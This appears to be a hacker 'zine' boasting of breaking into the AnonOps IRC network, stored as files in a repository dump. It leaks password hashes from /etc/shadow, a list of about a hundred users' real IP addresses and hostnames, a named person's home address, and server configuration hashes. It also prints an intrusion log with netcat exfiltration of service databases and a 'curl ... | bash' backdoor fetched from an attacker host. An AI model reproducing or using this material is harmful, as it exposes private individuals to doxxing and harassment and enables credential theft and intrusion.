rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
:: 0x05 ~ 1pS ::
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
:: 0x06 ~ l0l sh1t ::
Here's a bit of quotes we found funny.
_ _ _
| | | | (_)
__| | __ _| |__ ___ ___ __ _ _ ___ _ __ ___ __ _ _ __
/ _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \
| (_| | (_| | |_) | (_) | (_) | (_| | | __/ | | | | | (_| | | | |
\__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
__/ |
|___/
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
gline and/or kill
_
(_)
_ __ _ ___
| '_ \| |/ _ \
| |_) | | __/
| .__/|_|\___|
| |
|_|
<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
_ _
| | | |
___ __ _| | ___| |__
/ __/ _` | |/ _ \ '_ \
| (_| (_| | | __/ |_) |
\___\__,_|_|\___|_.__/
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack?
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
@CalebNewz: somehow their hitting my ip table.
_____ _____ _ __
/ _ \ \ /\ / / _ \ '_ \
| (_) \ V V / __/ | | |
\___/ \_/\_/ \___|_| |_|
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2
_ _____ __
/\ | | |__ \ \ / /
/ \ | |__ __ _ ) \ \_/ /
/ /\ \ | '_ \ / _` | / / \ /
/ ____ \| | | | (_| |/ /_ | |
/_/ \_\_| |_|\__,_|____| |_|
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it
____ ____ _ _ _
| _ \ _____ _____ _ _|___ \ / \ | | |
| |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
| __/ (_) \ V V / __/ | / __/ / ___ \| | |
|_| \___/ \_/\_/ \___|_| |_____/_/ \_\_|_|
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
That just smacks of gross negligence. Turn in your Guy Fawkes mask.
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
the provider.
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
_
_ __ ___ _ __ ___ ___| | ___ ___ _ __
| '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \
| | | __/ | | | | \__ \ | __/ __/ |_) |
|_| \___|_| |_| |_|___/_|\___|\___| .__/
|_|
D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
Names: Rick Bonata
Address 221 FRANKLIN AVE
CUYAHOGA FALLS, OH 44221
<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D
<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi
<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers
<remsleep> If the FBI does come, or whomever for whatever reason, I will have
them on camera with a live feed with a 3G modem backup streaming to one of
my VDSs. I would be unstopable after that, I would sue for false arrest,
kidnapping, conspiracy to each, general fuckery as well as a large sum of
punitive damages.
<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less.
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
[remsleep] Memo to ANY Law Enforcement: You are compelled to
leave this network, failure to do so will result in whatever
evidence obtained being after this point will become sealed
and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
notices attached to their servers
:: 0x07 ~ FiL3z ::
We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.
Filename Description
shadow /etc/shadow, self explanatory
oper.db Anope Oper Database
chan.db Anope Channel Database
nick.db Anope NickServ Database
keys.txt AnonOps private ssl key/cert
defaults.conf InspIRCd Conf.
nick.out.txt Human readable NickServ database w/ cracked passwords,
nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
access lists, akick lists, badwords, ..etc.
:: 0x08 ~ exit ::
tl;dr JAJA ANONOPS ESTAN MUERTO. (LOL DEAD)
AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.
VIVA LA CARLOS1337!!!!!
shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
for fighting the good fight.

35830
htp/HTP-4.txt Normal file

File diff suppressed because it is too large Load Diff

1058
htp/HTP-5.txt Normal file

File diff suppressed because it is too large Load Diff

817
htp/HTP-Anonops2.txt Executable file
View File

@ -0,0 +1,817 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">